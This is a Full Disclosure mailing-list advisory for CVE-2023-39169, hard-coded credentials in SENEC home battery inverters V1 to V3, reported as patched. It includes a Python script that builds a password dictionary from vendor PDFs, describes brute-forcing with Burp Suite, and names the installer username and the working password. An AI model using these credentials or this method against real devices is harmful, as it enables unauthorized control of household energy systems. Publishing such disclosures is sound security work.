[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Use of Hard-coded Credentials - CVE-2023-39169

To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] Senec Inverters Home V1, V2, V3 Home & Hybrid Use of Hard-coded Credentials - CVE-2023-39169
From: Phos4Me via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Date: Mon, 13 Nov 2023 10:50:12 +0000

> > Advisory ID: Ph0s-2023-003
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-307: Improper Restriction of Excessive
> > Authentication Attempts
> > CWE-798: Use of Hard-coded Credentials
> > 

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
> > 

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6
> > 

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39169
> > Author of Advisory: Ph0s[4], R0ckE7
> > 

> > ********************************************************************************
> > 

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.
> > 

> > About Senec:
> > We are SENEC
> > 

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> > 

> > About SENEC Home:
> > 

> > SENEC.Home: The smart electricity storage device for your home
> > 

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such 
> > as
> > when your household’s energy consumption rises in the evening, or on rainy 
> > days
> > when your PV system generates less power.
> > 

> > ********************************************************************************
> > 

> > Vulnerability Details:
> > 

> > Based on the previously identified hard-coded username in CVE-2023-39167 and
> > CVE-2023-39168 all technical requirements were met to target the password.
> > Since the username installateur is quite straightforward in the sense of
> > guessable, it was decided to perform a dictonary-type brute force attack.
> > For this purpose, all related PDF documents were downloaded to create a 
> > password
> > list specifically tailored to SENEC.Inverter.
> > Source of the Documents: https://senec.com/au/company/downloads
> > 

> > ********************************************************************************
> > 

> > Proof of Concept (PoC):
> > 

> > The attack consists of the following steps:
> > 

> > 1. parse the documents :
> > import argparse
> > import glob
> > import string
> > import fitz
> > 

> > def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):
> > pdf_text = ""
> > for file in glob.glob(f"{pdf_directory}/*.pdf"):
> > pdf = fitz.open(file)
> > for page in pdf:
> > pdf_text += page.get_text()
> > 

> > pdf_words = set(
> > [word.strip(string.punctuation) for word in pdf_text.split() if 
> > word.strip(string.punctuation).isalnum()]
> > )
> > senec_password = set(
> > [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not 
> > word.isnumeric()]
> > )
> > 

> > with open("senec-password.txt", mode="w", encoding="utf-8") as fd:
> > fd.write('\n'.join(senec_password))
> > 

> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Generate SENEC.Inverter 
> > password dictionary")
> > parser.add_argument("-d", "--pdf-directory", type=str, action="store", 
> > default="pdf", required=False,
> > help="pdf storage location")
> > parser.add_argument("-p", "--pwd-prefix", type=str, action="store", 
> > default="Senec", required=False,
> > help="password prefix")
> > parser.add_argument("-s", "--pwd-suffix", type=str, action="store", 
> > default="", required=False,
> > help="password suffix")
> > args = parser.parse_args()
> > get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)
> > 

> > 2. work with the output:
> > The Python script extracts all words from all PDF documents and allows to 
> > add a prefix
> > and/or suffix to generate passwords according to the pattern 
> > {prefix}{word}{suffix} ,
> > such as the following:
> > ***** cut *******
> > Senecmoribundity
> > SenecCleaning
> > Senecdusts
> > Senecclinical
> > Senecaggregation
> > Senecstubborn
> > Senecstorages
> > SenecDecommissioning
> > SenecInstall
> > Senecmany
> > ***** cut ********
> > 

> > 3) use the list within burpsuite
> > The password lists were then used in Burp Suite Professional, a tool
> > specifically designed for web application security testing, to perform an
> > automated brute force attack.
> > The list shown above as an excerpt with the prefix Senec and no suffix was
> > finally successful in executing the attack.
> > It could be determined that the password "SenecInstall" is valid for all
> > SENEC.Inverter devices.
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Disclosure Timeline:
> > 

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> > 

> > ************************************************************************
> > 

> > Researcher:
> > Ph0s[4], R0ckE7
> > 

> > ************************************************************************
> > 

> > Disclaimer:
> > 

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Copyright:
> > 

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc
Description: application/pgp-keys

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] [SYSS-2023-019] SmartNode SN200 - Unauthenticated OS Command Injection
Next by Date: [FD] SEC Consult SA-20231122 :: Multiple Vulnerabilities in m-privacy TightGate-Pro
Previous by thread: [FD] [SYSS-2023-019] SmartNode SN200 - Unauthenticated OS Command Injection
Next by thread: [FD] SEC Consult SA-20231122 :: Multiple Vulnerabilities in m-privacy TightGate-Pro
Index(es):
- Date
- Thread